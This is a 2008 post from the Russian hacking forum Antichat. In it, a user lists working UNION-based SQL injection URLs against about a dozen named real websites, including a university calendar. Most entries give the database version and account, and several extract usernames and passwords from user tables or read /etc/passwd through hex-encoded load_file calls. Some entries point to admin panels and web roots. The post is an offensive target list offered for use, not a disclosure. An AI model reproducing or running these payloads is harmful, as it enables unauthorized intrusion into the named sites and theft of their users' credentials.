ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 05.12.2008, 00:15
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
Angry

http://www.feltbikes.de
5.0.32-Debian_7etch6:root@localhost:felt_artikel
http://www.feltbikes.de/cross.php?id=-4+union+select+1,2,3,4,load_file(0x2f7661722f7777772f66656c742f6c69627261 72792e706870),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41/*
------------------------------------------------------------------------
http://www.furisto.de
5.0.32- Debian_7etch5:sk0223 2@localhost:usr_sk02 232_1
http://www.furisto.de/component/option,com_ownbiblio/index.php?option=com_ownbiblio&view=catalogue&year =All&catid=1+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users+ limit+1,100/*------------------------------------------------------------------------
http://digital.tomsk.ru
4.0.27-log:digitalwww@localhost
http://digital.tomsk.ru/?IDcatalog=975155&ItemID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
------------------------------------------------------------------------
http://www.diac.ru

http://www.diac.ru/news/comments.php?news_id=-1+union+select+1,2,3,4,5,6,7,8/*
------------------------------------------------------------------------
http://calendar.hpu.edu
Самое вкусное)) - еду!
http://calendar.hpu.edu/event_details.php?event_id=-2555+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40/*
5.0.26-standard:root@localhost:calendar
Подбираем таблицы и колонки!
Еще доступна читалка load_file()
load_file(0x2f6574632f706173737764) - /etc/passwd
load_file(0x2f6574632f706173737764) - function.php
/data0/httpd/calendar/htdocs - Дира!
http://calendar.hpu.edu/admin/ - Админка!
+ Можно перебирать колонки и таблицы! =)
------------------------------------------------------------------------
http://www.roguegovernment.com
4.1.22-standard:roguegov_publicr@localhost:roguegov_rgov
http://www.roguegovernment.com/news.php?id=-4682+union+select+1,2,3,4,5,6/*
------------------------------------------------------------------------
http://www.paristoutcourt.org
5.0.45-Debian_1ubuntu3.3-logaristoutcourtor@88.191.253.131aristoutcourt or
Есть таблица: ptc_users
Поля в таблице: user_login,user_pass,user_email
http://www.paristoutcourt.org/blogs/blog.php?id=7&blog=-1+union+select+1,2,concat_ws(char(58),user_login,user_pass,user_email ),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+ptc_user s/* Дальше через limit
------------------------------------------------------------------------
http://www.viaggiavventurenelmondo.it
5.0.45-Debian_1ubuntu3.3-log:anm_sites@172.17.12.13:cdocanm
Таблица: user
Колонки: login,password
http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=1+union+select+1,concat(login,char(58),password),3,4,5,6,7,8,9+from+user/* Дальше через limit
------------------------------------------------------------------------
http://www.kvartira-omsk.ru
5.0.27-standard-log:vashakvartira@localhost:vashakvartira
5ая версия - можно искать таблицы!
------------------------------------------------------------------------
http://www.easybackline.fr
4.1.11-Debian_4sarge7:easybkline@hebergement.oc3.fr:easyb kline
С этим сайтом работае через unhex(hex(...))
------------------------------------------------------------------------
http://www.cliocup.fr
5.0.44-log:root@localhost:wsr
5ая версия! Можно перебирать...
Так же есть читалка через load_file()
load_file(0x2f6574632f706173737764) - /etc/passwd

------------------------------------------------------------------------

Последний раз редактировалось Tigger; 05.12.2008 в 01:33..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ